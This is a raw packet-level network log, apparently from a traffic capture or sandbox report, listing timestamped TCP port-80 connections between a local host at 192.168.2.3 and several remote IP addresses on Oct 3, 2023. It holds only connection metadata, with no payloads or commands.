                                                                                                        Oct 3, 2023 18:02:54.114785910 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.114789963 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.114846945 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.114856005 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.114905119 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.210963011 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.210977077 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.210985899 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.211148977 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.211158991 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.211168051 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.211194992 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.211225986 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.211225986 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.211241961 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.211312056 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.211359978 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.211359978 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.211378098 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.211386919 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.211400986 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.211450100 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.211586952 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.211647987 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.252074957 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.252274036 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.267831087 CEST8049864104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.268069029 CEST8049864104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.268129110 CEST4986480192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:54.269541025 CEST4986480192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:54.309521914 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.309549093 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.309598923 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.309627056 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.309640884 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.309729099 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.309807062 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.309864044 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.309914112 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.309969902 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.310015917 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.310080051 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.310101032 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.310165882 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.310201883 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.310257912 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.310306072 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.310359955 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.310415983 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.310496092 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.310589075 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.310631990 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.310657024 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.310709953 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.310790062 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.311125040 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.347037077 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.347048998 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.386574030 CEST4986680192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:54.404411077 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.404460907 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.481452942 CEST8049866172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.481561899 CEST4986680192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:54.481755018 CEST4986680192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:54.482410908 CEST4986680192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:54.576332092 CEST8049866172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.577155113 CEST8049866172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.818543911 CEST8049866172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.818653107 CEST8049866172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.818726063 CEST4986680192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:54.820277929 CEST4986680192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:54.842840910 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.842853069 CEST8049865172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.842931032 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.844691992 CEST4986580192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:54.939431906 CEST4986780192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:54.965599060 CEST4986880192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:55.033740997 CEST8049867104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.033886909 CEST4986780192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:55.034143925 CEST4986780192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:55.034765005 CEST4986780192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:55.060349941 CEST8049868172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.060543060 CEST4986880192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:55.060731888 CEST4986880192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:55.061429977 CEST4986880192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:55.128129959 CEST8049867104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.128762007 CEST8049867104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.155291080 CEST8049868172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.155852079 CEST8049868172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.400047064 CEST8049868172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.400064945 CEST8049868172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.400266886 CEST4986880192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:55.402023077 CEST4986880192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:55.405039072 CEST8049867104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.405050993 CEST8049867104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.405124903 CEST4986780192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:55.406034946 CEST4986780192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:55.523958921 CEST4986980192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:55.532414913 CEST4987080192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:55.618681908 CEST8049869104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.618911982 CEST4986980192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:55.619213104 CEST4986980192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:55.619890928 CEST4986980192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:55.627296925 CEST8049870172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.627523899 CEST4987080192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:55.632570028 CEST4987080192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:55.633078098 CEST4987080192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:55.713835955 CEST8049869104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.714495897 CEST8049869104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.727400064 CEST8049870172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.728106022 CEST8049870172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.895060062 CEST8049870172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.895083904 CEST8049870172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.895183086 CEST4987080192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:55.896378040 CEST4987080192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:55.960421085 CEST8049869104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.960462093 CEST8049869104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.960547924 CEST4986980192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:55.961733103 CEST4986980192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:56.034554005 CEST4987180192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:56.128979921 CEST8049871172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:56.129081011 CEST4987180192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:56.129379034 CEST4987180192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:56.129756927 CEST4987180192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:56.223896980 CEST8049871172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:56.223954916 CEST8049871172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:56.225286007 CEST4987280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:56.319914103 CEST8049872104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:56.320020914 CEST4987280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:56.320220947 CEST4987280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:56.326909065 CEST4987280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:56.414414883 CEST8049872104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:56.421288013 CEST8049872104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:56.496340990 CEST8049871172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:56.496448994 CEST8049871172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:56.496541977 CEST4987180192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:56.497441053 CEST4987180192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:56.644843102 CEST4987380192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:56.654113054 CEST8049872104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:56.654153109 CEST8049872104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:56.654211044 CEST4987280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:56.655311108 CEST4987280192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:56.739495993 CEST8049873104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:56.739717007 CEST4987380192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:56.739839077 CEST4987380192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:56.740246058 CEST4987380192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:56.769490957 CEST4987480192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:56.834856987 CEST8049873104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:56.834932089 CEST8049873104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:56.864501953 CEST8049874104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:56.864590883 CEST4987480192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:56.864770889 CEST4987480192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:56.865149021 CEST4987480192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:56.961414099 CEST8049874104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:56.961474895 CEST8049874104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:57.123342037 CEST8049873104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:57.123383999 CEST8049873104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:57.123481989 CEST4987380192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:57.124521971 CEST4987380192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:57.265625954 CEST4987580192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:57.360796928 CEST8049875104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:57.361008883 CEST4987580192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:57.361108065 CEST4987580192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:57.361444950 CEST4987580192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:57.455745935 CEST8049875104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:57.456132889 CEST8049875104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:57.724811077 CEST8049875104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:57.724862099 CEST8049875104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:57.724940062 CEST4987580192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:57.726016045 CEST4987580192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:57.863955021 CEST4987680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:57.959016085 CEST8049876104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:57.959114075 CEST4987680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:57.959419966 CEST4987680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:57.959798098 CEST4987680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:58.059613943 CEST8049876104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:58.059658051 CEST8049876104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:58.191694021 CEST8049874104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:58.191745996 CEST8049874104.21.1.18192.168.2.3
                                                                                                        Oct 3, 2023 18:02:58.191842079 CEST4987480192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:58.192893982 CEST4987480192.168.2.3104.21.1.18
                                                                                                        Oct 3, 2023 18:02:58.309236050 CEST4987780192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:58.322891951 CEST8049876104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:58.322935104 CEST8049876104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:02:58.323112011 CEST4987680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:58.324806929 CEST4987680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:02:58.404174089 CEST8049877172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:58.404398918 CEST4987780192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:58.404520988 CEST4987780192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:58.404942989 CEST4987780192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:58.456528902 CEST4987880192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:58.499224901 CEST8049877172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:58.499593973 CEST8049877172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:58.551177979 CEST8049878172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:58.551431894 CEST4987880192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:58.551646948 CEST4987880192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:58.552074909 CEST4987880192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:58.645807981 CEST8049878172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:58.646473885 CEST8049878172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:58.847258091 CEST8049877172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:58.847296000 CEST8049877172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:58.847449064 CEST4987780192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:58.848483086 CEST4987780192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:58.950978994 CEST8049878172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:58.951039076 CEST8049878172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:58.951080084 CEST4987880192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:58.952068090 CEST4987880192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:58.965739965 CEST4988080192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:59.060993910 CEST8049880172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:59.061098099 CEST4988080192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:59.061306000 CEST4988080192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:59.061748028 CEST4988080192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:59.076128960 CEST4988180192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:59.156279087 CEST8049880172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:59.156416893 CEST8049880172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:59.170566082 CEST8049881172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:59.170787096 CEST4988180192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:59.170874119 CEST4988180192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:59.171250105 CEST4988180192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:59.265408993 CEST8049881172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:59.265548944 CEST8049881172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:59.382268906 CEST8049880172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:59.382333040 CEST8049880172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:59.382563114 CEST4988080192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:59.384063959 CEST4988080192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:59.533726931 CEST4988280192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:59.564811945 CEST8049881172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:59.564877987 CEST8049881172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:59.565233946 CEST4988180192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:59.566035032 CEST4988180192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:59.628683090 CEST8049882172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:59.628803015 CEST4988280192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:59.629100084 CEST4988280192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:59.629554033 CEST4988280192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:02:59.697093964 CEST4988380192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:59.723660946 CEST8049882172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:59.724200010 CEST8049882172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:02:59.791776896 CEST8049883172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:59.791872025 CEST4988380192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:59.792160034 CEST4988380192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:59.793621063 CEST4988380192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:59.886852980 CEST8049883172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:59.887970924 CEST8049883172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:03:00.190222025 CEST8049883172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:03:00.190269947 CEST8049883172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:03:00.190349102 CEST4988380192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:00.191692114 CEST4988380192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:00.584500074 CEST4988480192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:03:00.679202080 CEST8049884104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:03:00.679300070 CEST4988480192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:03:00.679527044 CEST4988480192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:03:00.684148073 CEST4988480192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:03:00.774133921 CEST8049884104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:03:00.778716087 CEST8049884104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:03:01.056703091 CEST8049884104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:03:01.056751013 CEST8049884104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:03:01.056802988 CEST4988480192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:03:01.389759064 CEST4988480192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:03:01.518340111 CEST4988580192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:01.613112926 CEST8049885172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:03:01.613250017 CEST4988580192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:01.613476038 CEST4988580192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:01.613933086 CEST4988580192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:01.708002090 CEST8049885172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:03:01.708151102 CEST8049885172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:03:01.962044954 CEST8049885172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:03:01.962112904 CEST8049885172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:03:01.962301016 CEST4988580192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:01.964025021 CEST4988580192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:02.080519915 CEST4988680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:03:02.175900936 CEST8049886104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:03:02.175995111 CEST4988680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:03:02.176198006 CEST4988680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:03:02.176556110 CEST4988680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:03:02.270931959 CEST8049886104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:03:02.271094084 CEST8049886104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:03:02.562010050 CEST8049886104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:03:02.562122107 CEST8049886104.21.81.17192.168.2.3
                                                                                                        Oct 3, 2023 18:03:02.562165976 CEST4988680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:03:02.563113928 CEST4988680192.168.2.3104.21.81.17
                                                                                                        Oct 3, 2023 18:03:04.696017981 CEST4988780192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:04.790983915 CEST8049887172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:03:04.791336060 CEST4988780192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:04.791336060 CEST4988780192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:04.791851997 CEST4988780192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:04.886677027 CEST8049887172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:03:04.886696100 CEST8049887172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:03:05.207709074 CEST8049887172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:03:05.207732916 CEST8049887172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:03:05.207947969 CEST4988780192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:05.208914042 CEST4988780192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:05.347918034 CEST4988880192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:05.443037987 CEST8049888172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:03:05.443218946 CEST4988880192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:05.443566084 CEST4988880192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:05.443912983 CEST4988880192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:05.538325071 CEST8049888172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:03:05.538929939 CEST8049888172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:03:05.678751945 CEST8049888172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:03:05.678770065 CEST8049888172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:03:05.678858995 CEST4988880192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:05.682440996 CEST4988880192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:05.756474018 CEST8049882172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:03:05.756491899 CEST8049882172.67.151.219192.168.2.3
                                                                                                        Oct 3, 2023 18:03:05.756627083 CEST4988280192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:03:05.760526896 CEST4988280192.168.2.3172.67.151.219
                                                                                                        Oct 3, 2023 18:03:05.811511040 CEST4988980192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:05.905906916 CEST8049889172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:03:05.906156063 CEST4988980192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:05.906244040 CEST4988980192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:05.906907082 CEST4988980192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:03:05.907357931 CEST4989080192.168.2.3104.21.1.18
